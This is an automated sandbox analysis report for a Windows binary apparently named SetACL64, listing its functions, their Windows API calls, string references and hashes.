Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalErrorEventLastLeaveNameSectionTimeUser$CurrentFileMutexObjectReleaseResetSingleSystemThreadWait
String ID:
API String ID: 3424761043-0
Opcode ID: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
Instruction ID: 5a9a26cd481a4aafe4b8519b3825663fe5e4ac1cd163496f22314ffde96ce16c
Opcode Fuzzy Hash: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
Instruction Fuzzy Hash: 93C18AA2B18B42C6EB108F64E4842AC3371FF49B98F404639DA5D977A9DF3DE944C760

Function 00007FF68685F3C0 Relevance: 13.7, APIs: 9, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameW.ADVAPI32 ref: 00007FF68685F44D
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F453
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F45E
LookupAccountNameW.ADVAPI32 ref: 00007FF68685F54D
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F557
IsValidSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F593
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F647
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F64D
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68685F653

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$AccountLookupName_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskValid
String ID:
API String ID: 311209037-0
Opcode ID: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
Instruction ID: 7838ea96591f6919d988251c95671d1217f67598a4a12cd07ed5671115db3171
Opcode Fuzzy Hash: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
Instruction Fuzzy Hash: B371B3A2A18B82C1EA249F11A54837D72A5FF84BD4F544339DA5E87794DF3DE840C760

Function 00007FF68683CD0A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 226
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68683D0A0: EnterCriticalSection.KERNEL32 ref: 00007FF68683D0CB

Part of subcall function 00007FF686834FC0: GetModuleFileNameW.KERNEL32 ref: 00007FF68683503A

RegisterEventSourceW.ADVAPI32 ref: 00007FF68683CFAC
LeaveCriticalSection.KERNEL32 ref: 00007FF68683D051
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683D084
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683D08A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683D090

Strings

DefaultEventSource, xrefs: 00007FF68683CDE1

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterEventFileLeaveModuleNameRegisterSource
String ID: DefaultEventSource
API String ID: 352910984-1672983561
Opcode ID: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
Instruction ID: 2341e1106d9bb87b406ea7b9219e5e7204037fb8b3fa904901ebbdec40725e6c
Opcode Fuzzy Hash: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
Instruction Fuzzy Hash: 5EA17FA2A14B81C5EF008F38D5593AD2361FF5479CF408639E76C46AEADF7AE990C310

Function 00007FF686821649 Relevance: 9.0, APIs: 6, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF686821653
LeaveCriticalSection.KERNEL32 ref: 00007FF686821667
EnterCriticalSection.KERNEL32 ref: 00007FF68682169C
CloseHandle.KERNEL32 ref: 00007FF6868216B0
DeregisterEventSource.ADVAPI32 ref: 00007FF6868216C9
LeaveCriticalSection.KERNEL32 ref: 00007FF6868216D9

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseDeregisterEventHandleSource
String ID:
API String ID: 1038480651-0
Opcode ID: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
Instruction ID: 01282b4f724d8db2e810c013bc1b0ad67a049cfbad9f96916154a0a70914a905
Opcode Fuzzy Hash: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
Instruction Fuzzy Hash: AD0140B1A5C546CAFA649B15B8A83386351BFC8B42F040539CA8EC62B1CF2FAC44C220

Function 00007FF68684B710 Relevance: 7.7, APIs: 5, Instructions: 167
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B812
RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B913
RegCloseKey.ADVAPI32 ref: 00007FF68684B935
RegCloseKey.ADVAPI32 ref: 00007FF68684B9EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC33

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseEnum
String ID:
API String ID: 315095564-0
Opcode ID: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
Instruction ID: f17295a7acbb393cbc26fbf098ac0917ac34fda75c2bf7f700e9551725c7babe
Opcode Fuzzy Hash: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
Instruction Fuzzy Hash: AF61A0B2B18B8189E710CB65E4443AD63A6FF88798F000139DF8C97A99DF7DD851C350

Function 00007FF68686E62C Relevance: 7.6, APIs: 5, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686E650
CreateThread.KERNELBASE ref: 00007FF68686E691
GetLastError.KERNEL32 ref: 00007FF68686E69F
CloseHandle.KERNEL32 ref: 00007FF68686E6BC
FreeLibrary.KERNEL32 ref: 00007FF68686E6CB

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
Instruction ID: 4f4e6655c75991c81f382e311add3e66d325f98655b955f22151f194085fd6e3
Opcode Fuzzy Hash: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
Instruction Fuzzy Hash: 14217CA1A1D746C7EE14DB65B41C17A62A1BF84B80F040438DB4E8BB65DE3EEC00C720

Function 00007FF686877C10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF686877C49
CompareStringEx.KERNELBASE ref: 00007FF686877C9D
CompareStringW.KERNEL32 ref: 00007FF686877CD1

Strings

CompareStringEx, xrefs: 00007FF686877C3D

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CompareString$try_get_function
String ID: CompareStringEx
API String ID: 3689094840-2590796910
Opcode ID: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
Instruction ID: 7bfabdca1d66a2a3f9f3a2324ae164c7a885d269652f01ccad6e996147076fdf
Opcode Fuzzy Hash: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
Instruction Fuzzy Hash: 3611F476A08B81C6D760CB56B4402AAB7A5FBC9B94F54413AEE8D83B59CF3DD850CB40

Function 00007FF686877F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF686877F5D
GetUserDefaultLocaleName.KERNELBASE(?,?,000000A0,00007FF6868764C4), ref: 00007FF686877F6C
GetUserDefaultLCID.KERNEL32(?,?,000000A0,00007FF6868764C4), ref: 00007FF686877F74

Strings

GetUserDefaultLocaleName, xrefs: 00007FF686877F40, 00007FF686877F4A

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: DefaultUser$LocaleNametry_get_function
String ID: GetUserDefaultLocaleName
API String ID: 1828775994-151340334
Opcode ID: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
Instruction ID: 05d9bead7f0838353dfe26d75060d3004569bf9f1f0d959f80ae06c94cb722ba
Opcode Fuzzy Hash: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
Instruction Fuzzy Hash: C5F082D0F0D542D2FB159BA5A6816F85262BF897C4F84503EEA0D86A65CE3E9C44C760

Function 00007FF6868622FC Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF686862310

Part of subcall function 00007FF6868624C8: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6868624EA

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF686862325
__scrt_release_startup_lock.LIBCMT ref: 00007FF686862393
__scrt_is_managed_app.LIBCMT ref: 00007FF68686240A

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
String ID:
API String ID: 1321466686-0
Opcode ID: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
Instruction ID: 8e55ef543592d83e15f5f4f303edf39ddf02620efcdaf2e0f01c5c7ed0162edb
Opcode Fuzzy Hash: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
Instruction Fuzzy Hash: 50311CA1A18207C2FA54AB24956A3B923A1BF45784F44407DEB4DC72E7DE6FEC04C271

Function 00007FF68686B6DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686B714
_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686B94A

Strings

*, xrefs: 00007FF68686B823

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
Opcode ID: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
Instruction ID: d9db731998cd69f38668c40e0926809cc0251caa76e6e6a7f9c0f6c02a62f5e2
Opcode Fuzzy Hash: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
Instruction Fuzzy Hash: FA7183B2968252CAE7685F29805917C3BA6FF05B9CF14013DDB4E832A5DF3ADC61D720

Function 00007FF686879DFC Relevance: 4.6, APIs: 3, Instructions: 84COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF686879E19

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
Instruction ID: cb9d928fbc81a6f574a27b2e87fc4c36a9dc7a536c2f28ab6676619084e45aa6
Opcode Fuzzy Hash: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
Instruction Fuzzy Hash: 9331B2F2F1C286C6FE605B15A44427E62A0BF41B90F544138FA6D877D6DEAEEC80C720

Function 00007FF68683DBB8 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

CRTCL,, xrefs: 00007FF68683DBBE
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$CRTCL,
API String ID: 3988221542-3126492506
Opcode ID: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
Instruction ID: c1336558399e9978695b06de419bb5e68287b28f16c2204c8023a805ffc7f616
Opcode Fuzzy Hash: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
Instruction Fuzzy Hash: DB218EE1A28A82C0EA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360

Function 00007FF68683DB7C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

WARN ,, xrefs: 00007FF68683DB82
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$WARN ,
API String ID: 3988221542-3785767073
Opcode ID: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
Instruction ID: 94ec21e71a35c75c73d903f0950ca0891fd00adfc18471546a05abaf0d527c39
Opcode Fuzzy Hash: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
Instruction Fuzzy Hash: 9E218EE1A28A82C0EA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360

Function 00007FF68683DB9A Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

%s, xrefs: 00007FF68683DC4B
ERROR,, xrefs: 00007FF68683DBA0

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$ERROR,
API String ID: 3988221542-2486372128
Opcode ID: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
Instruction ID: 6f97fc8dcd2a94427c30544f1ea6cf847d3ce5060d0428e265c58a7bdcc3ba64
Opcode Fuzzy Hash: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
Instruction Fuzzy Hash: 3C218EE1A28A82C0FA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360

Function 00007FF68683DBD6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

NONE ,, xrefs: 00007FF68683DBD6
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$NONE ,
API String ID: 3988221542-1825952341
Opcode ID: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
Instruction ID: a39bc4c2b0b0eec86f14d6d8857a5336f15b75a23feaa9da804d6cfe7f99d67d
Opcode Fuzzy Hash: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
Instruction Fuzzy Hash: 0A215EE2A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360

Function 00007FF68683DB6A Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

%s, xrefs: 00007FF68683DC4B
DEBUG,, xrefs: 00007FF68683DB6A

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$DEBUG,
API String ID: 3988221542-4222748730
Opcode ID: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
Instruction ID: c896ced5c6946f9d38d80ba34c12e247d80a2698bd2acdc86c964ed8d9fd544f
Opcode Fuzzy Hash: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
Instruction Fuzzy Hash: AD215EE1A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360

Function 00007FF68683DB73 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

INFO ,, xrefs: 00007FF68683DB73
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$INFO ,
API String ID: 3988221542-2224252516
Opcode ID: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
Instruction ID: 7bbc6948b846f3cf8d721f176df0d063582e63bbddc437c88f266e96b764c0b2
Opcode Fuzzy Hash: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
Instruction Fuzzy Hash: 27215EE1A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360

